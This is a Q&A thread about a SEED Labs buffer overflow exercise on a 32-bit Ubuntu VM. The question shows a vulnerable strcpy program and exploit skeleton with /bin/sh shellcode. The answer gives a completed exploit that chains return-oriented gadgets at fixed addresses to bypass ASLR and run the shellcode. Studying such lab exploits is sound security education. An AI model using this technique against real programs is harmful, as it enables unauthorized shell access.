# Buffer Overflow, modified Seedlab question?

Tags: c, buffer-overflow

In this Lab, I have exploit.c, stack.c and call_shellcode.c. Stack.c has been modifed so it prints out the buffer address and ebp address. I am running this on Virtual Machine, ubuntu 12.04 32 bit.

I have to use the vulnerable program stack.c and put code in exploit.c in order to create a shell when running my stack executable. Any help is appreciated.

Stack.c is down below Sorry for bad indentation, actual code has proper indentation.

```
#include <stdlib.h>
#include <stdio.h>
#include <string.h>

unsigned long int sp;


int cp(char *str)
{
//    unsigned long int sp;
char buffer[12];
asm("movl %%ebp, %0" : "=r" (sp));
printf("$ebp is 0X%lx\n",sp);

strcpy(buffer, str);

printf("Buffer is at address %p\n",(void*)(&buffer));
return 1;
}

int main(int argc, char **argv)
{
char str[517];
FILE *badfile;

badfile = fopen("badfile", "r");
fread(str, sizeof(char), 517, badfile);
cp(str);

printf("Returned Properly\n");
return 1;
}
```

And exploit.c is down below.

```
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
char shellcode[]=
"\x31\xc0"             /* xorl    %eax,%eax              */
"\x50"                 /* pushl   %eax                   */
"\x68""//sh"           /* pushl   $0x68732f2f            */
"\x68""/bin"           /* pushl   $0x6e69622f            */
"\x89\xe3"             /* movl    %esp,%ebx              */
"\x50"                 /* pushl   %eax                   */
"\x53"                 /* pushl   %ebx                   */
"\x89\xe1"             /* movl    %esp,%ecx              */
"\x99"                 /* cdq                            */
"\xb0\x0b"             /* movb    $0x0b,%al              */
"\xcd\x80"             /* int     $0x80                  */
;

void main(int argc, char **argv)
{
char buffer[517];
FILE *badfile;

/* Initialize buffer with 0x90 (NOP instruction) */
memset(&buffer, 0x90, 517);

/* You need to fill the buffer with appropriate contents here */ 


/* Save the contents to the file "badfile" */
badfile = fopen("./badfile", "w");
fwrite(buffer, 517, 1, badfile);
fclose(badfile);
}
```

I have ran gdb on my stack executable, compiled with gcc -o stack -z execstack -fno-stack-protector stack.c, and have found the buffer to be at address 0xbffff134 and ebp at 0xbffff148. I understand I have to somehow find my return address and make my payload be at that addresss? Some help regarding bufferoverflow with this assignment is needed please.

Comment: doesn't compile on clang (currently I don't have gcc handy) because of `invalid operand type` on `line 12` in `Stack.c`. `sp` should be an `32 bit` type. Should be `int main`, too.

Comment: @ToxiCore are you sure that you compile for 32 bit? Looks like your target is x86-64

Comment: @ToxiCofe I believe that is an error when not compiling for 32 bit, however this is done in a VM on ubuntu 12.04 32 bit, so I have no error

Comment: Yes, I've overlooked that, no problem should arise on a 32 bit platform

Comment: @ToxiCore any help regarding my problem?

Answer (score 0):

#### You need bypass ASLR, refer to the link below

https://sploitfun.wordpress.com/2015/05/08/bypassing-aslr-part-iii/

#### Find gadget:

```
pop ebx; ret;                                         // construct ebx value
add al, 0x08; add dword [ebx+0x5D5B04C4], eax; ret;   // construct eax value
add dword [ebx+0x0804A028], esp; call dword [0x08049F1C+eax*4]
```

- construct eax and ebx value
- write the ESP value to the 0804a020 memory, then execute it

#### Modified exploit.c:

```
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
char shellcode[]=
    "\x31\xc0"             /* xorl    %eax,%eax              */
    "\x50"                 /* pushl   %eax                   */
    "\x68""//sh"           /* pushl   $0x68732f2f            */
    "\x68""/bin"           /* pushl   $0x6e69622f            */
    "\x89\xe3"             /* movl    %esp,%ebx              */
    "\x50"                 /* pushl   %eax                   */
    "\x53"                 /* pushl   %ebx                   */
    "\x89\xe1"             /* movl    %esp,%ecx              */
    "\x99"                 /* cdq                            */
    "\xb0\x0b"             /* movb    $0x0b,%al              */
    "\xcd\x80"             /* int     $0x80                  */
    ;

int main(int argc, char **argv)
{
    char buffer[517];
    FILE *badfile;
    int i;
    unsigned int *val = (unsigned int*)buffer;

    /* Initialize buffer with 0x90 (NOP instruction) */
    memset(&buffer, 0x90, 517);

    /* You need to fill the buffer with appropriate contents here */
    val[6] = 0x08048378;       /* pop ebx; ret; */
    val[7] = 0xaaa9a03c;       /* ebx */
    for(i=8; i<16; i++)        
        val[i] = 0x0804847c;   /* add al, 0x08; add dword [ebx+0x5D5B04C4], eax; ret; */
    val[16] = 0x08048378;      /* pop ebx; ret; */
    val[17] = 0xfffffff8;      /* ebx */
    val[18] = 0x08048462;      /* add dword [ebx+0x0804A028], esp; */
                               /* call dword [0x08049F1C+eax*4] */
    memcpy(&val[19], shellcode, sizeof(shellcode));

    /* Save the contents to the file "badfile" */
    badfile = fopen("./badfile", "w");
    fwrite(buffer, 517, 1, badfile);
    fclose(badfile);
    return 0;
}
```